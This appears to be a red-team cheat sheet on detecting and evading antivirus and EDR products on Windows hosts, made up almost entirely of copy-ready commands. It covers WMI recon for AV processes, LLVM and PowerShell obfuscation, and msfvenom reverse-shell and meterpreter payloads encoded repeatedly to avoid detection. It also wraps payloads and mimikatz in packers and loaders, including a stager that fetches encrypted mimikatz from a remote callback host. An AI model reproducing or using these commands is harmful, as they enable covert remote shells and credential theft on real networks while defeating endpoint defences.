Toy EDRs
Recon
Common AV process names:
Process Name Vendor/Product Check Point End Point Security
Search for active AV processes on hosts (local admin priveleges required):
Copy Cmd > WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
PS > Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
PS > gc .\100-hosts.txt | % {gwmi -Query "select * from Win32_Process" -ComputerName $_ | ? {$_.Caption -in "MsMpEng.exe"} | select ProcessName,PSComputerName}
Identify Microsoft.NET version from inspecting assembly properties:
Copy PS > cd C:\Windows\Microsoft.NET\Framework64\
PS > ls
PS > cd .\v4.0.30319\
PS > Get-Item .\clr.dll | Fl
Or
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item .\clr.dll)).FileVersion
Identify Microsoft.NET version from querying the registry:
Copy PS > Get-ItemProperty "HKLM:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -Name Release
Windows build <-> default .NET Framework version associations:
Windows Build Default .NET Framework Version
.NET Framework version <-> CLR version associations:
.NET Framework Version CLR Version
Note that we don't have to target the exact .NET Framework version when compiling our tools. It's enough to match the above relationship between .NET Framework version and CLR version, i. e. all 4.x versions will execute on CLR v4. For example, Rubeus compiled to target v4.5 will run on a machine with only .NET v4.0 installed.
Attacking EDRs
EDR Blindspots
Bring Your Own Interpreter (BYOI)
Python
Pyramid
BOFs with Python
Python RDI
PE Obfuscation
OLLVM
Install LLVM 13.x obfuscator based on heroims/obfuscator and tpoechtrager/wclang :
Copy apk update
apk add --no-cache build-base cmake git python3 mingw-w64-gcc
rm -rf /var/cache/apk/*
git clone --depth=1 -b llvm-13.x --single-branch https://github.com/heroims/obfuscator /opt/ollvm
cd /opt/ollvm
wget https://github.com/llvm/llvm-project/commit/ff1681ddb303223973653f7f5f3f3435b48a1983.patch
patch llvm/include/llvm/Support/Signals.h < ff1681ddb303223973653f7f5f3f3435b48a1983.patch
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../llvm
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=`realpath ../clang`|g" CMakeCache.txt
make -j7
make install
git clone --depth=1 https://github.com/tpoechtrager/wclang /opt/wclang
cd /opt/wclang
cmake .
make -j7
make install
rm -rf /opt/ollvm /opt/wclang && mkdir /build
Tools
PowerShell Tactics
PowerShell Obfuscation
Invoke-Obfuscation
Out-EncryptedScript.ps1
Copy PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1
PS > . .\evil.ps1
PS > $dec = de "Passw0rd!" s4lt
PS > Invoke-Expression $dec
PowerShellArmoury
Copy PS > git clone https://github.com/cfalta/PowerShellArmoury
PS > cd PowerShellArmoury
PS > curl https://github.com/snovvcrash/WeaponizeKali.sh/raw/main/conf/PSArmoury.json -o PSArmoury.json
PS > . .\New-PSArmoury.ps1
PS > New-PSArmoury -ValidateOnly -Config PSArmoury.json
PS > New-PSArmoury -Path armored.ps1 -Config PSArmoury.json
PS > cat -raw .\armored.ps1 | iex
Tools
msfvenom
Copy $ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe
Veil-Evasion
Hyperion + Pescramble
Copy $ wine hyperion.exe input.exe output.exe
$ wine PEScrambler.exe -i input.exe -o output.exe
GreatSCT
Install and generate a payload:
Copy $ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT
$ cd ~/tools/GreatSCT/setup
$ ./setup.sh
$ cd .. && ./GreatSCT.py
...generate a payload...
$ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml}
$ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
Exec with msbuild.exe
and get a shell:
Copy PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml
Ebowla
Copy $ git clone https://github.com/Genetic-Malware/Ebowla ~/tools/Ebowla && cd ~/tools/Ebowla
$ sudo apt install golang mingw-w64 wine python-dev -y
$ sudo python -m pip install configobj pyparsing pycrypto pyinstaller
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.13.37 LPORT=1337 --platform win -f exe -a x64 -o rev.exe
$ vi genetic.config
...Edit output_type, payload_type, clean_output, [[ENV_VAR]]...
$ python ebowla.py rev.exe genetic.config && rm rev.exe
$ ./build_x64_go.sh output/go_symmetric_rev.exe.go ebowla-rev.exe [--hidden] && rm output/go_symmetric_rev.exe.go
[+] output/ebowla-rev.exe
PEzor
Wrap executable into PEzor:
Copy $ bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2
inceptor
ScareCrow
Huan
Copy Cmd > .\Huan.exe mimikatz.exe mimiLoader.exe
Cmd > .\mimiLoader.exe
charlotte
Copy $ sudo apt install 'mingw-w64*' -y
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f raw > beacon.bin
$ python charlotte.py
Cmd > rundll32.exe charlotte.dll, <XOR_KEY>
MeterPwrShell
Copy $ sudo ./MeterPwrShell2Kalix64 -c noaptupdate
stager_libpeconv
Copy $ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv
$ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4
$ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456
$ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337
Cmd > dist\stager.exe